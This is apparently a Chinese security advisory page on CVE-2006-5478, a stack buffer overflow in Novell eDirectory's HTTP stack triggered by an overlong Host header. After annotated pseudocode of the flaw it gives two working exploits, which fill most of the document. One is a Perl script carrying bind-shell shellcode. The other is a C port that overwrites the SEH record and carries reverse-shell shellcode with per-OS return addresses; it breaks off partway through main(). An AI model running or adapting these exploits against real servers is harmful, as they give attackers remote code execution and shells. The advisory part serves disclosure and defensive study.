Novell eDirectory/iMonitor HTTPSTK栈缓冲区溢出漏洞

发布日期:2006-10-21
更新日期:2006-10-31

受影响系统:
Novell eDirectory <= 8.7.3.8
不受影响系统:
Novell eDirectory 8.8
描述:
BUGTRAQ  ID: 20655
CVE(CAN) ID: CVE-2006-5478

Novell eDirectory是一个跨平台的目录服务器。

Novell eDirectory在处理用户请求构造回应时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。

Novell的HTTP协议栈(httpstk)没有检查客户端所提供的HTTP Host请求头(如Host: www.host.com)值的长度。服务器在构造HTTP重定向响应时,通过snprintf()把Host值拷贝到SendRedirectRsp()中的一个64字节栈缓冲区,但传给snprintf()的长度参数取自Host值自身的长度,而不是目标缓冲区的剩余容量;随后端口后缀还用不带长度限制的sprintf()追加。因此超长的Host值会覆盖栈上的返回地址,导致以加载httpstk库的进程的权限执行任意指令。C++伪代码如下:

// Constants and format strings used by the HRequest methods below (the
// advisory authors' reconstruction of httpstk; the names are theirs).
#define HTTPHDR_HOST_FIELD 211           // index handed to ReqHdrValue() to fetch the client's Host: value
char szHttp[] = "HTTP";                  // protocol-stack names looked up via PStkGetProtocolStackByName()
char szHttps[] = "HTTPS";                // in SendRedirectRsp()
char szHttpS[] = "http%s://";            // redirect URL scheme prefix; %s becomes "s" or nothing
char szCrlf[] = "\r\n";                  // terminator searched for when measuring the Host value
char szS[] = "s";                        // the "s" of "https"
char szD[] = ":%d";                      // port suffix, appended with an unbounded sprintf()
char szS_3[] = "%s";                     // format used when _snprintf()ing the Host value
BYTE nullbyte = '\0';                    // BYTE is not defined in this excerpt (presumably a Windows unsigned char)
// Socket-address buffer as reconstructed by the advisory. The member sizes
// add up to 2+2+4+16+42 = 66 bytes, which is the literal that
// BuildRedirectURL() passes to memset() when clearing its local copy.
typedef struct SAL_AddrBuf_t {
short sin_family;           // AF_INET or AF_INET6, copied from ReqHostAddress()
u_short sin_port;           // redirect port in network byte order, filled in by the PStkEnumTransports() callback
struct in_addr sin_addr;    // IPv4 address (copied when sin_family == AF_INET)
struct in6_addr sin6_addr;  // IPv6 address (copied when sin_family == AF_INET6)
char sa_data[42];           // not touched in this excerpt
} SAL_AddrBuf;
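// HTTP request object from httpstk as reconstructed by the advisory authors.
// Only the members that matter for the overflow carry meaning; `uint` and
// `something` are placeholders for fields the authors did not name.  (The
// page-break text "Page 2" that had been spliced into the member list in the
// original listing has been removed; nothing else changed.)
class HRequest
{
public:
int SendRedirectRsp(void);              // builds a redirect into a 64-byte stack buffer via BuildRedirectURL()
int SendHeader(int);
int SendNotFoundRsp(void);
int SendEndOfContent(void);
int RspSetHdrValue(char *, char *);
bool ReqIsSecureChannel(void);          // true when the request arrived over SSL
char *ReqHdrValue(unsigned int);        // raw, client-supplied value of a request header (NULL if absent)
SAL_AddrBuf *ReqHostAddress(void);      // address family / address of the listening transport
private:
int BuildRedirectURL(unsigned int, bool, char *);  // takes no size for the output buffer -- see its definition
char *path;
HDR_LOOKUP_TBL *ValueTable;
unsigned int uint;
int something;
SOCKET sock;
SAL_AddrBuf name;
};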
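// Vulnerable routine (CVE-2006-5478) exactly as reconstructed in the
// advisory; the overflow is intentionally left in so the listing matches the
// text above.  Only the page-break text ("Page 3") that was spliced into the
// body of the original listing has been removed.
//
// Writes "http[s]://<Host value>[:port]" into redirect_url, which its caller
// in this listing, SendRedirectRsp(), declares as a 64-byte stack array.  The
// function is never told that capacity: the _snprintf() bound below is
// derived from the attacker-supplied Host value, and the ":%d" suffix is
// appended with an unbounded sprintf(), so a Host value longer than the room
// left after the scheme prefix ("http://" = 7 bytes, "https://" = 8 bytes)
// overruns the caller's frame.
//
//   stackid       protocol-stack id from PStkGetProtocolStackByName()
//   fl_https      true when the request arrived over SSL (selects "https://")
//   redirect_url  caller-owned output buffer, size unknown here
//   returns       ERROR_SUCCESS, SERR_INVALID_REQUEST, SERR_OBJECT_NOT_FOUND,
//                 or 0 when PStkEnumTransports() fails
int HRequest::BuildRedirectURL(unsigned int stackid, bool fl_https,
char *redirect_url)
{
register char *colon, *crlf;
register size_t length;
register unsigned short port; // Original just recycled stackid
// Stack variables
SAL_AddrBuf SAL;
char *szHostHdrValue;
SAL_AddrBuf *pSAL;
int retval;
// Zero-out the local SAL_AddrBuf structure (66 == sum of its member sizes)
memset(&SAL,0,66);
// Fill in the class' SAL_AddrBuf structure with IP and port
pSAL = ReqHostAddress();
SAL.sin_family = pSAL->sin_family;
// This fills in the redirect port in SAL.sin_port
retval = PStkEnumTransports(stackid, 2, &Callback, &SAL);
if ((retval != 0) && (retval != SERR_CALLBACK_CANCELLED)) {
return(0);
}
// Obtain a pointer to the user-supplied HTTP Host-Header value
szHostHdrValue = ReqHdrValue(HTTPHDR_HOST_FIELD);
if (szHostHdrValue == NULL) {
return(SERR_INVALID_REQUEST);
}
// Exclude colon and/or CRLF from length of host header value.
// `length` is taken entirely from the client's data and is never compared
// against the destination.  (For exploit writers this is also why the
// payload must avoid ':' (0x3a), CR, LF and NUL: they end the copied span.)
colon = strchr(szHostHdrValue, ':');
if (colon == NULL) {
crlf = strstr(szHostHdrValue, szCrlf);
if (crlf == NULL) {
length = strlen(szHostHdrValue);
}
else {
length = crlf - szHostHdrValue;
}
}
else {
length = colon - szHostHdrValue;
}
// Determine if the redirect URL should be https:// or http://
// (pseudocode: passing `nullbyte` for %s presumably stands for an empty string)
if (fl_https) {
redirect_url += sprintf(redirect_url, szHttpS, szS);
}
else {
redirect_url += sprintf(redirect_url, szHttpS, nullbyte);
}
// Append the Host-Header value to the redirect URL
// *** BUG: the size argument is length+1, i.e. the size of the SOURCE, so
// _snprintf() copies the whole Host value regardless of the destination's
// remaining capacity.  A correct version needs the caller's buffer size
// (e.g. an extra parameter) and must reject or truncate when `length`
// exceeds the space left after the scheme prefix.
_snprintf(redirect_url, length+1, szS_3, szHostHdrValue);
redirect_url += length;
// Is IPv4
if (SAL.sin_family == AF_INET) {
if (retval == ERROR_SUCCESS) {
if (SAL.sin_port == 0) {
return(SERR_OBJECT_NOT_FOUND);
}
else {
memcpy((void *)&SAL.sin_addr.s_addr,
(void *)&pSAL->sin_addr.s_addr, 4);
}
}
}
// Is IPv6
else if (SAL.sin_family == AF_INET6) {
if (retval == ERROR_SUCCESS) {
if (SAL.sin_port == 0) {
return(SERR_OBJECT_NOT_FOUND);
}
else {
memcpy((void *)&SAL.sin6_addr.u,
(void *)&pSAL->sin6_addr.u, 16);
}
}
}
// Convert the port from network byte order to host byte order
port = ntohs(SAL.sin_port);
// Append the port to the redirect URL if it is non-standard
if ((fl_https && port == 443) || (!fl_https && port == 80)) {
return(ERROR_SUCCESS);
}
// Also unbounded: up to 6 more bytes (":65535") plus the terminator land
// past whatever the Host value already wrote.
sprintf(redirect_url, szD, port);
return(ERROR_SUCCESS);
}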
int HRequest::SendRedirectRsp(void) {
register int retval;
register bool fl_https;
// Stack variables
char redirect_url[64];
char *memblock;
unsigned int stackid;
// Determine if the connection is operating over SSL
fl_https = ReqIsSecureChannel();
if (!fl_https) {
retval = PStkGetProtocolStackByName(szHttps, &stackid);
}
else {
retval = PStkGetProtocolStackByName(szHttp, &stackid);
}
if (retval == ERROR_SUCCESS) {
// Call this function to begin building the redirect URL
retval = BuildRedirectURL(stackid, fl_https, redirect_url);
// Remaining code snipped for brevity
}

BuildRedirectURL()调用_snprintf()将用户提供的HTTP Host请求头值存储到SendRedirectRsp()中声明的64字节栈缓冲区redirect_url。这段代码的预期行为是将客户端重新定向到请求中所指定的有效URL。正确的做法是把snprintf()的长度参数设置为目标缓冲区剩余的容量;但这段代码把长度参数设为Host值本身的长度(length+1),该值完全由攻击者控制、与目标缓冲区的容量无关,随后又用不带长度限制的sprintf()追加":端口"后缀。因此攻击者只要提供一个超过缓冲区剩余空间(扣除"http://"或"https://"前缀后约56字节)的Host请求头值,就能触发标准的栈溢出并覆盖返回地址。需要注意的是,由于服务器在':'或CRLF处截断Host值且C字符串以NUL结束,攻击载荷中不能包含0x00、0x0a、0x0d和0x3a字节。

<*来源:Michael Ligh (michael.ligh@mnin.org)
        Ryan Smith (ryan@hustlelabs.com)
  
  链接:http://www.mnin.org/advisories/2006_novell_httpstk.pdf
        http://marc.theaimsgroup.com/?l=full-disclosure&m=116189831524330&w=2
        http://secunia.com/advisories/22519
        http://marc.theaimsgroup.com/?l=bugtraq&m=116259343304917&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

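#!perl
#
# "Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit
#
# Author:  Manuel Santamarina Suarez
# e-Mail:  FistFuXXer@gmx.de
#
# Sends one HTTP request whose Host: header overflows the 64-byte
# redirect_url stack buffer in httpstk's HRequest::BuildRedirectURL()
# (see the advisory pseudocode above).  NOTE(review): the advisory lists
# eDirectory 8.8 as NOT affected; the version in this title is the exploit
# author's and has not been reconciled with it.
#
# Usage: perl exploit.pl [target_ip] [target_port]
#        (the defaults below are the original hard-coded values)
#

use strict;
use warnings;
use IO::Socket;

#
# destination IP address and TCP port (httpstk/iMonitor, default 8028)
#
my $ip   = defined $ARGV[0] ? $ARGV[0] : '192.168.1.25';
my $port = defined $ARGV[1] ? $ARGV[1] : 8028;

#
# RETurn address.  Must be free of 0x00, 0x0a, 0x0d and 0x3a: the server
# stops measuring the Host value at ':' or CRLF (strchr/strstr in
# BuildRedirectURL) and the C string ends at the first NUL.
#
my $ret = pack( 'V', 0x5f833b7a );    # CALL ESP, MFC42U.5f833b7a (little-endian)

#
# 0x00, 0x0a, 0x0d, 0x3a free shellcode
#
# win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
#
my $sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
     "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
     "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
     "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
     "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
     "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38".
     "\x4e\x56\x46\x42\x46\x32\x4b\x58\x45\x44\x4e\x43\x4b\x48\x4e\x57".
     "\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48".
     "\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38".
     "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c".
     "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
     "\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x57\x45\x4e\x4b\x48".
     "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54".
     "\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x38".
     "\x49\x38\x4e\x46\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x53\x4b\x4d".
     "\x46\x36\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x44\x4e\x50\x4b\x58".
     "\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x36".
     "\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
     "\x43\x35\x48\x56\x4a\x56\x43\x33\x44\x53\x4a\x46\x47\x57\x43\x47".
     "\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
     "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
     "\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x46\x44\x30".
     "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
     "\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x35\x43\x35\x43\x35\x43\x54".
     "\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x31".
     "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x36\x46\x4a".
     "\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41".
     "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42".
     "\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d".
     "\x4a\x46\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x35\x4f\x4f\x48\x4d".
     "\x42\x55\x46\x55\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x36".
     "\x47\x4e\x49\x37\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x45".
     "\x4f\x4f\x42\x4d\x48\x36\x4c\x36\x46\x56\x48\x46\x4a\x56\x43\x36".
     "\x4d\x46\x49\x38\x45\x4e\x4c\x56\x42\x45\x49\x35\x49\x32\x4e\x4c".
     "\x49\x58\x47\x4e\x4c\x56\x46\x44\x49\x48\x44\x4e\x41\x53\x42\x4c".
     "\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x54\x4e\x52".
     "\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
     "\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x44\x4f\x4f".
     "\x48\x4d\x4b\x55\x47\x55\x44\x35\x41\x55\x41\x35\x41\x55\x4c\x46".
     "\x41\x50\x41\x45\x41\x55\x45\x45\x41\x35\x4f\x4f\x42\x4d\x4a\x46".
     "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x56".
     "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
     "\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
     "\x4a\x36\x50\x57\x4a\x4d\x44\x4e\x43\x37\x43\x45\x4f\x4f\x48\x4d".
     "\x4f\x4f\x42\x4d\x5a";

print '"Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit'."\n\n";

my $sock = IO::Socket::INET->new
(
   PeerAddr => $ip,
   PeerPort => $port,
   Proto    => 'tcp',
   Timeout  => 2
) or do {
   print '[-] Error: Could not establish a connection to the server!';
   exit(1);
};

print "[+] Connected.\n";
print "[+] Trying to overwrite RETurn address...\n";

#
# 68 bytes of filler reach the saved return address (the C port below places
# its fake return address at the same offset), then the CALL ESP address,
# then the shellcode that ESP points at when the overwritten return executes.
# Request line and header go out in a single send so nothing is lost if the
# server closes the connection between two writes.
#
my $payload = "GET /nds HTTP/1.1\r\n"
            . 'Host: ' . 'SEXY' x 17 . $ret . $sc . "\r\n\r\n";

my $sent = $sock->send( $payload );
if ( !defined $sent || $sent != length $payload ) {
   print "[-] Error: send() failed or was short\n";
   close( $sock );
   exit(1);
}

print "[+] Done. Now check for bind shell on $ip:4444!\n";

close( $sock );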


=====================================================
/*
       _______         ________           .__        _____          __
___  __\   _  \   ____ \_____  \          |  |__    /  |  |   ____ |  | __
\  \/  /  /_\  \ /    \  _(__  <   ______ |  |  \  /   |  |__/ ___\|  |/ /
>    <\  \_/   \   |  \/       \ /_____/ |   Y  \/    ^   /\  \___|    <
/__/\_ \\_____  /___|  /______  /         |___|  /\____   |  \___  >__|_ \
      \/      \/     \/       \/   30\10\06    \/      |__|      \/     \/
      
*   mm.           dM8
*  YMMMb.       dMM8      _____________________________________
*   YMMMMb     dMMM'     [                                     ]
*    `YMMMb   dMMMP      [ There are doors I have yet to open  ]
*      `YMMM  MMM'       [ windows I have yet to look through  ]
*         "MbdMP         [ Going forward may not be the answer ]
*     .dMMMMMM.P         [                                     ]
*    dMM  MMMMMM         [       maybe I should go back        ]
*    8MMMMMMMMMMI        [_____________________________________]
*     YMMMMMMMMM                   www.netbunny.org
*       "MMMMMMP
*      MxM .mmm
*      W"W """


[i] Title:              Novell eDirectory <= 9.0 DHost Buffer overflow exploit
[i] Discovered by:      Novell
[i] Original code by:   FistFuXXer
[i] Exploit by:         Expanders
[i] Filename:           XHNB-Novell-eDirectory_remote_bof.c
[i] References:         http://www.novell.com/
[i] Greetings:          x0n3-h4ck - netbunny

[ Research diary ]

After trying FistFuXXer's perl exploit I ported the code to C and used a different exploitation
method: this exploit overwrites the Structured Exception Handler (SEH) record (the "next" pointer and the handler address) to take control of the program flow, rather than relying on the saved return address alone.

[ Special thanks ]

FistFuXXer
H D Moore

[ Links ]

www.x0n3-h4ck.org
www.netbunny.org

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#define BUFFSIZE 1000 // Attack buffer size; main() lays out 746 payload bytes plus a NUL inside it
#define DEADRET "\xde\xc0\xad\xde" // 0xdeadc0de, little-endian: written over the saved return address
                                   // so that returning into it faults and Windows walks the
                                   // (also overwritten) SEH chain

int banner();                                        // prints the ASCII banner, returns 0
int usage(char *filename);                           // prints help + target list, then exit(0)
int inject(char *port, char *ip);                    // patches the connect-back ip/port into shellcode[]
int remote_connect( char* ip, unsigned short port ); // TCP connect to the victim, exit(1) on failure


/* Request template; %s receives the whole payload as the Host: value.
 * Nothing in the payload may contain ':' (0x3a), CR, LF or NUL: httpstk
 * measures the copied span up to the first ':' or CRLF, and the C string
 * ends at NUL (see the advisory pseudocode above). */
char attack[] =
"GET /nds HTTP/1.1\r\n"
"Host: %s\r\n\r\n";

/* win32_reverse -  EXITFUNC=seh Size=312 Encoder=Pex http://metasploit.com
 * Bytes 12..18 (\x81\x73\x13\x3f\x61\x88\x6f == xor dword [ebx+0x13], 0x6F88613F)
 * are the Pex decoder's XOR; its key bytes 3f 61 88 6f are what inject()
 * applies when it writes the connect-back IP into bytes 184..187 and the
 * port into bytes 190..191 (as shipped they decode to 10.0.0.3:1030). */
char shellcode[] =
"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
"\x61\x88\x6f\x83\xeb\xfc\xe2\xf4\xc3\x0b\x63\x22\xd7\x98\x77\x90"
"\xc0\x01\x03\x03\x1b\x45\x03\x2a\x03\xea\xf4\x6a\x47\x60\x67\xe4"
"\x70\x79\x03\x30\x1f\x60\x63\x26\xb4\x55\x03\x6e\xd1\x50\x48\xf6"
"\x93\xe5\x48\x1b\x38\xa0\x42\x62\x3e\xa3\x63\x9b\x04\x35\xac\x47"
"\x4a\x84\x03\x30\x1b\x60\x63\x09\xb4\x6d\xc3\xe4\x60\x7d\x89\x84"
"\x3c\x4d\x03\xe6\x53\x45\x94\x0e\xfc\x50\x53\x0b\xb4\x22\xb8\xe4"
"\x7f\x6d\x03\x1f\x23\xcc\x03\x2f\x37\x3f\xe0\xe1\x71\x6f\x64\x3f"
"\xc0\xb7\xee\x3c\x59\x09\xbb\x5d\x57\x16\xfb\x5d\x60\x35\x77\xbf"
"\x57\xaa\x65\x93\x04\x31\x77\xb9\x60\xe8\x6d\x09\xbe\x8c\x80\x6d"
"\x6a\x0b\x8a\x90\xef\x09\x51\x66\xca\xcc\xdf\x90\xe9\x32\xdb\x3c"
"\x6c\x22\xdb\x2c\x6c\x9e\x58\x07\x35\x61\x88\x6c\x59\x09\x8c\x69"
"\x59\x32\x01\x8e\xaa\x09\x64\x96\x95\x01\xdf\x90\xe9\x0b\x98\x3e"
"\x6a\x9e\x58\x09\x55\x05\xee\x07\x5c\x0c\xe2\x3f\x66\x48\x44\xe6"
"\xd8\x0b\xcc\xe6\xdd\x50\x48\x9c\x95\xf4\x01\x92\xc1\x23\xa5\x91"
"\x7d\x4d\x05\x15\x07\xca\x23\xc4\x57\x13\x76\xdc\x29\x9e\xfd\x47"
"\xc0\xb7\xd3\x38\x6d\x30\xd9\x3e\x55\x60\xd9\x3e\x6a\x30\x77\xbf"
"\x57\xcc\x51\x6a\xf1\x32\x77\xb9\x55\x9e\x77\x58\xc0\xb1\xe0\x88"
"\x46\xa7\xf1\x90\x4a\x65\x77\xb9\xc0\x16\x74\x90\xef\x09\x78\xe5"
"\x3b\x3e\xdb\x90\xe9\x9e\x58\x6f";

/* Stage reached after the SEH handler returns into jmpover: a 22-byte
 * XOR(0x55) decoder followed by 20 encoded bytes that, per the author's
 * note, jump back 256+256+64 bytes into the NOP sled in front of the
 * shellcode (the jump target was not verified in this review). */
char jmpback[]=
//22 byte xor decoder (0x55)
"\xEB\x0F\x5B\x33\xC9\x66\x83\xE9\xE0\x80\x33\x55\x43\xE2\xFA\xEB\x05\xE8\xEC\xFF\xFF\xFF"
//(20 byte jump-back code -> 256 + 256 + 64 bytes)
"\x8C\xBB\x8C\x21\x71\xA1\x0C\xD5\x94\x5F\xC5\xAB\x98\xAB\x98\xD5\xBC\x15\xAA\xB4";

/* Written over the SEH record's "next" pointer.  EB 06 is a short jump 6
 * bytes forward: over the two NOPs and the 4-byte handler address that
 * main() places right after it, into the NOPs before jmpback. */
char jmpover[]=
// 2 bytes jump 6 bytes over - 2 bytes NOP
"\xEb\x06\x90\x90";

/* SEH handler addresses, selected by <targ> in main().  Each is expected to
 * be a pop/pop/ret gadget so that execution lands on the SEH record itself,
 * i.e. on the jmpover bytes above.  The first entry carries no gadget
 * description in the original and was not checked here. */
struct retcodes{char *platform;unsigned long addr;} targets[]= {
        { "eDirectory MFC42U.dll", 0x5f80bbf7 },
        { "Windows NT SP 5/6"    , 0x776a1082 },   // ws2help.dll pop esi, pop ebx, retn  [Tnx to metasploit]
    { "Windows 2k Universal" , 0x750211a9 },   // ws2help.dll pop ebp, pop ebx, retn  [Tnx to metasploit]
    { "Windows XP Universal" , 0x71abe325 },   // ws2help.dll pop ebx, pop ebp, retn  [Tnx to metasploit]
    { NULL }                                    // sentinel: usage() and main() stop here
};
/* Prints the ASCII-art banner and the credit lines to stdout.
 * The text contains no conversion specifiers, so it is emitted with fputs()
 * rather than printf().  Always returns 0. */
int banner() {
  static const char *const art[] = {
    "\n       _______         ________           .__        _____          __     \n",
    "___  __\\   _  \\   ____ \\_____  \\          |  |__    /  |  |   ____ |  | __ \n",
    "\\  \\/  /  /_\\  \\ /    \\  _(__  <   ______ |  |  \\  /   |  |__/ ___\\|  |/ / \n",
    " >    <\\  \\_/   \\   |  \\/       \\ /_____/ |   Y  \\/    ^   /\\  \\___|    <  \n",
    "/__/\\_ \\\\_____  /___|  /______  /         |___|  /\\____   |  \\___  >__|_ \\ \n",
    "      \\/      \\/     \\/       \\/               \\/      |__|      \\/     \\/ \n\n",
    "[i] Title:        \tNovell eDirectory DHost Buffer overflow\n",
    "[i] Perl Code by:\tFistFuXXer\n",
    "[i] Exploit by:   \tExpanders\n\n",
  };
  size_t k;
  for (k = 0; k < sizeof art / sizeof art[0]; k++)
    fputs(art[k], stdout);
  return 0;
}

/* Prints the command-line help and the numbered target table, then exits
 * the process with status 0 (the declared int return is never reached).
 * filename is argv[0].  Note the help text mentions a default port of 8028,
 * but main() requires all five arguments and applies no default. */
int usage(char *filename) {
  static const char *const help[] = {
    "       \t<host>   : Victim's host\n",
    "       \t<port>   : Victim's port  ::  Default: 8028\n",
    "       \t<l_ip>   : Local ip address for connectback\n",
    "       \t<l_port> : Local port for connectback\n",
    "       \t<targ>   : Target from the list below\n\n",
    "#   \t Platform\n",
    "-----------------------------------------------\n",
  };
  size_t k;
  int n;

  printf("Usage: \t%s <host> <port> <l_ip> <l_port> <targ>\n\n", filename);
  for (k = 0; k < sizeof help / sizeof help[0]; k++)
    fputs(help[k], stdout);
  /* targets[] ends with a NULL platform sentinel */
  for (n = 0; targets[n].platform != NULL; n++)
    printf("%d \t %s\n", n, targets[n].platform);
  fputs("-----------------------------------------------\n", stdout);
  exit(0);
}

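/* Patches the connect-back IP and port into the win32_reverse shellcode.
 *
 * The Pex decoder at the top of `shellcode` XORs the encoded body dword by
 * dword with 0x6F88613F (the immediate at shellcode[15..18], bytes
 * 3f 61 88 6f).  The IP placeholder is at shellcode[184..187] and the port
 * at shellcode[190..191], so every byte stored there must be pre-XORed with
 * the key byte the decoder will apply at that position ((190-184) % 4 == 2,
 * hence key[2], key[3] for the port).  Doing this byte-wise on the
 * network-order representation makes the result independent of the host's
 * endianness and word size; the original copied the first 4 bytes of an
 * `unsigned long`, which is wrong on 64-bit big-endian hosts.
 *
 * port  decimal TCP port string (1..65535)
 * ip    dotted-quad IPv4 address string
 * Returns 0 on success; -1 (message printed, shellcode untouched) when
 * either argument does not parse.
 */
int inject(char *port, char *ip)
{
    static const unsigned char key[4] = { 0x3f, 0x61, 0x88, 0x6f };
    unsigned char raw[4];
    in_addr_t addr;
    unsigned short nport;
    long p;
    char *end;
    int i;

    addr = inet_addr(ip);
    if (addr == INADDR_NONE) {
        printf("[X] Invalid connect-back IP \"%s\"\n", ip);
        return -1;
    }
    p = strtol(port, &end, 10);
    if (port[0] == '\0' || *end != '\0' || p < 1 || p > 65535) {
        printf("[X] Invalid connect-back port \"%s\"\n", port);
        return -1;
    }

    memcpy(raw, &addr, 4);                      /* network byte order, as inet_addr() stores it */
    for (i = 0; i < 4; i++)
        shellcode[184 + i] = (char)(raw[i] ^ key[i]);

    nport = htons((unsigned short)p);
    memcpy(raw, &nport, 2);                     /* network byte order */
    shellcode[190] = (char)(raw[0] ^ key[2]);
    shellcode[191] = (char)(raw[1] ^ key[3]);
    return 0;
}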

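/* Opens a TCP connection to ip:port and returns the connected socket.
 *
 * Resolution uses getaddrinfo() (gethostbyname() is obsolete and not
 * thread-safe); every IPv4 address returned for the name is tried in turn,
 * and a socket whose connect() fails is closed before moving on.  As in the
 * original, resolution or connection failure exits the process with 1.
 *
 * ip    host name or dotted-quad address of the victim
 * port  TCP port in host byte order
 */
int remote_connect( char* ip, unsigned short port )
{
  struct addrinfo hints, *res, *rp;
  char portstr[6];
  int s = -1, err;

  memset ( &hints, 0x0, sizeof ( hints ) );
  hints.ai_family   = AF_INET;
  hints.ai_socktype = SOCK_STREAM;
  snprintf ( portstr, sizeof ( portstr ), "%u", (unsigned) port );

  err = getaddrinfo ( ip, portstr, &hints, &res );
  if ( err != 0 )
  {
   printf ( "[X] Cannot resolve \"%s\": %s\n", ip, gai_strerror ( err ) );
   exit ( 1 );
  }
  for ( rp = res; rp != NULL; rp = rp->ai_next )
  {
   s = socket ( rp->ai_family, rp->ai_socktype, rp->ai_protocol );
   if ( s < 0 )
   {
    printf ( "[X] Socket failed!\n" );
    continue;
   }
   if ( connect ( s, rp->ai_addr, rp->ai_addrlen ) == 0 )
    break;
   close ( s );   /* do not leak the descriptor before trying the next address */
   s = -1;
  }
  freeaddrinfo ( res );
  if ( s < 0 )
  {
   printf ( "[X] Failed connecting!\n" );
   exit ( 1 );
  }
  return ( s );
}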

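/* Entry point: builds the SEH-overwrite payload, patches the connect-back
 * address into the shellcode and sends a single "GET /nds" request whose
 * Host: header carries the payload.
 *
 * argv: <host> <port> <l_ip> <l_port> <targ> (see usage()).
 * Returns 0 once the request has been sent; every failure path exit(1)s,
 * or calls usage() which exit(0)s.
 *
 * Payload layout inside `buffer` (byte offsets):
 *     0.. 67  'A' filler up to the saved return address
 *    68.. 71  DEADRET, an invalid return address that raises the exception
 *    72..267  NOP sled
 *   268..579  shellcode (312 bytes)
 *   580..679  NOP sled
 *   680..683  jmpover            -> SEH record "next" pointer
 *   684..687  targets[targ].addr -> SEH handler (pop/pop/ret), little-endian
 *   688..695  NOPs
 *   696..737  jmpback (XOR decoder + jump back towards the shellcode)
 *   738..745  NOPs, then a NUL so the buffer can be used as a C string
 */
int main(int argc, char *argv[]) {
    int s, position, targ, ntargets;
    size_t sent, total;
    unsigned long handler;
    char *buffer, *request;
    char *end;

    banner();
    if( (argc != 6) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) )
        usage(argv[0]);

    /* <targ> indexes targets[]; the original never range-checked it, so an
     * out-of-range value read past the NULL sentinel. */
    for (ntargets = 0; targets[ntargets].platform != NULL; ntargets++)
        ;
    targ = (int)strtol(argv[5], &end, 10);
    if (argv[5][0] == '\0' || *end != '\0' || targ < 0 || targ >= ntargets) {
        printf("[X] Invalid target \"%s\" (valid: 0..%d)\n", argv[5], ntargets - 1);
        usage(argv[0]);
    }

    printf("[+] Creating evil buffer\n");
    buffer = (char *) malloc(BUFFSIZE);
    /* attack's "%s" is replaced by at most BUFFSIZE-1 bytes, so
     * BUFFSIZE + strlen(attack) leaves room for the terminating NUL. */
    request = (char *) malloc(BUFFSIZE + strlen(attack));
    if (buffer == NULL || request == NULL) {
        printf("[X] Out of memory\n");
        exit(1);
    }
    memset(buffer,0x90,BUFFSIZE);  // Fill with nops

    /* Xor port and ip and put them into the shellcode (inject() reports a
     * non-zero status only if it validates its arguments). */
    if (inject(argv[4],argv[3]) != 0) {
        printf("[X] Could not patch the connect-back address into the shellcode\n");
        exit(1);
    }
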